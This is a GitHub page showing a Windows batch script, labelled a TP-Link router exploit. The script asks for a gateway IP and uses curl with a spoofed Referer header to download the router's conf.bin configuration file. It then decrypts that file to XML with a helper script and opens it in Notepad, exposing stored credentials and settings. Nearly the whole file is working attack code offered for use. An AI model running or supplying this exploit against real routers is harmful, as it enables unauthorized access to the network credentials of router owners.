-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathrun.bat
More file actions
26 lines (23 loc) · 889 Bytes
/
run.bat
File metadata and controls
26 lines (23 loc) · 889 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
@echo off
color a
title RouterExploit
pip install pycryptodome
cls
echo.
echo.
echo.
echo +::::::::::::::::::::::::::::::::::::::::::::::::::+
echo + RouterExploit +
echo +::::::::::::::::::::::::::::::::::::::::::::::::::+
echo + Exploit TP-LINK Router Config File +
echo +::::::::::::::::::::::::::::::::::::::::::::::::::+
echo + Creator : BL4CKH47H4CK3R +
echo +::::::::::::::::::::::::::::::::::::::::::::::::::+
echo.
echo.
set /p gateway=[*] Enter Gateway IP (e.g. 192.168.0.1):
curl -s -k -X GET -H "Referer: http://%gateway%/mainFrame.htm" http://%gateway%/cgi/conf.bin > conf.bin
echo.
py bin2xml.py conf.bin conf.xml
del conf.bin
notepad conf.xml